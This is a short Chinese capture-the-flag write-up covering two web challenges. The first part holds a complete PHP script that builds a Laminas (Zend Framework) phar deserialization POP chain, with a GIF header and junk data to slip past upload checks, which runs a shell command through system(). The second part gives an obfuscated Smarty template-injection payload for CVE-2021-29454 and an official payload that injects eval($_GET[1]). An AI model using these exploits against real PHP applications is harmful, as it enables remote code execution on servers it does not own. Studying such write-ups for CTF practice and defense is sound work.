好久没打比赛了,练练手

Web

Fan website

Zend FrameWork Pop Chain

Zend FrameWork Pop Chain - 先知社区 (aliyun.com)

有源码,发现是上面那条链子,用phar可以触发,有限制大小和检测文件头的部分,用垃圾数据和gzip压缩一下就能绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php

namespace Laminas\View\Resolver{
    class TemplateMapResolver{
        protected $map = ["setBody"=>"system"];
    }
}
namespace Laminas\View\Renderer{
    class PhpRenderer{
        private $__helpers;
        function __construct(){
            $this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
        }
    }
}


namespace Laminas\Log\Writer{
    abstract class AbstractWriter{}

    class Mail extends AbstractWriter{
        protected $eventsToMail = ["cat /flag"];  
        protected $subjectPrependText = null;
        protected $mail;
        function __construct(){
            $this->mail = new \Laminas\View\Renderer\PhpRenderer();
        }
    }
}

namespace Laminas\Log{
    class Logger{
        protected $writers;
        function __construct(){
            $this->writers = [new \Laminas\Log\Writer\Mail(),"3kb的垃圾数据可以写在这"];
        }
    }
}

namespace{
$poc = new \Laminas\Log\Logger();
$phar = new \Phar('phar.phar');
$phar -> startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');   //设置stub,增加gif文件头
$phar -> addFromString('test.txt','test');  //添加要压缩的文件
$phar -> setMetadata($poc);  //将自定义meta-data存入manifest
$phar -> stopBuffering();

}

?>

gzip压缩,去掉phar头的特征

image-20220322170150238

直接上传后,获得path,然后在删除相册的地方触发

phar:///var/www/html/img/xxxx.jpg

Smarty_calculator

smarty的模板注入,CVE-2021-29454

Remote Code Execution (RCE) in smarty/smarty | CVE-2021-29454 | Snyk

草,真是cve

math表达式有可以绕过的地方

1
2
{math equation="(('1chr'[1].'1chr'[2].'1chr'[3])(115).('1chr'[1].'1chr'[2].'1chr'[3])(121).('1chr'[1].'1chr'[2].'1chr'[3])(115).('1chr'[1].'1chr'[2].'1chr'[3])(116).('1chr'[1].'1chr'[2].'1chr'[3])(101).('1chr'[1].'1chr'[2].'1chr'[3])(109))(('1chr'[1].'1chr'[2].'1chr'[3])(119).('1chr'[1].'1chr'[2].'1chr'[3])(104).('1chr'[1].'1chr'[2].'1chr'[3])(111).('1chr'[1].'1chr'[2].'1chr'[3])(97).('1chr'[1].'1chr'[2].'1chr'[3])(109).('1chr'[1].'1chr'[2].'1chr'[3])(105))" chr=1}
// system('whoami')

后期没再看,没环境了,本地能打通,线上环境有disable_function,应该绕过就行

官方payload

1
data=%7Bfunction%20name%3D'exp()%7B%7D%3Beval(%24_GET%5B1%5D)%3Bfunction%0A%0A'%7D%7B%2Ffunction%7D